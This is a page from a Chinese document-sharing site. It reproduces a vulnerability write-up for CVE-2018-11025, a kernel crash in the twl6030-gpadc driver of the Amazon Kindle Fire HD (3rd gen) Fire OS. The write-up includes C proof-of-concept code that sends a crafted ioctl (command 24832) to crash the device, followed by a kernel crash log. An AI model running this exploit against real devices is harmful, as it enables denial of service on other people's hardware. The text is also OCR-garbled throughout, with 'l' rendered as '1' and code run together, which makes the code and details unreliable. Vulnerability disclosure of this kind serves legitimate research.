(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx
《(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx(8页珍藏版)》请在第一文库网上搜索。
1、(CVE-2018-11025)AmazonKind1eFireHD(3rd)FireOSkerne1组件安全漏洞一、漏洞简介AmazonKind1eFireHD(3rd)FireOS4.5.5.3内核组件中的内核模块omapdriversmfdtw16030-gpadc.c允许攻击者通过设备/dev/tw16030上的ioct1的参数注入特制的参数-gpadc命令24832并导致内核崩溃。要探索此漏洞,必须打开设备文件devtw16030-gpadc,并使用命令24832和精心设计的有效负载作为第三个参数在此设备文件上调用ioct1系统调用。二、漏洞影响FireOS4.5.5.3三、复现过程
2、poc/* ThisispocofKind1eFireHD3rd* Abugintheioct1interfaceofdevicefi1edevtw16030-gpadccauses* thesystemcrashviaIOCT124832.* ThisPocshou1drunwithpermissiontodoioct1ondevtw16030-gpadc.*/#inc1ude#inc1ude#inc1udeinc1udeconststaticchar*driver=devtw16030-gpadc;staticcommand=24832;structtw16030_gpadc_user_p
3、armsintchanne1;intstatus;unsignedshortresu1t;;intmain(intargc,char*argvjchar*env)structtw16030_gpadc_user_parmspay1oad;pay1oad.channe1=0x9b2a9212;pay1oad.status=0x0;pay1oad.resu1t=0x0;intfd=0;fd=OPen(driver,O_RDWR);if(fd/data/IOCaItmp1og);return-1;printf(Tryioct1devicefi1e%s,withcommand0%andpay1oadN
4、U11njdriver,command);printf(Systemwi11crashandreboot.n);if(ioct1(fdjcommand,&pay1oad)data1oca1tmp1og);return-1;c1ose(fd);return0;崩溃日志18460.321624Unab1etohand1ekerne1pagingrequestatvirtua1address4b3f25fc18460.330139pgd=ca21000018460.3332514b3f25fc*pgd=0000000018460.337768Interna1error:Oops:5#1PREEMPT
5、SMPARM18460.343810Modu1es1inkedin:omap1fb(0)pvrsrvkm(O)pvr_1ogger(0)18460.351440CPU:0Tainted:GO(3.4.83-gd2afc0bae69#D18460.358825PCisattw16030_gpadc_ioct1+0x160/0x18018460.3643791Risattw16030_gpadc_conversion+0x5c/0x48418460.370452pc:yIr:psr:6003001318460.370452sp:de94dd90ip:00000000fp:de94df0418460
6、.383422r10:00000000r9:dcccf608r8:bea875ec18460.389282ecr7:de94c000r6:00000000r5:00006100r4:bea87518460.39669701r3:fffffeb4r2:4b3f2730r1:de94dee8r0:00000018460.404113mentuserF1ags:ZCvIRQsonFIQsonModeSVC_32ISAARMSeg18460.41204818460.418609Contro1:10c5387dTab1e:8a21004aDAC:0000001518460.418609PC:0c031b
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- CVE-2018-11025Amazon Kindle Fire HD 3rd OS kernel组件安全漏洞 CVE 2018 11025 Amazon rd kernel 组件 安全漏洞
链接地址:https://www.001doc.com/doc/794834.html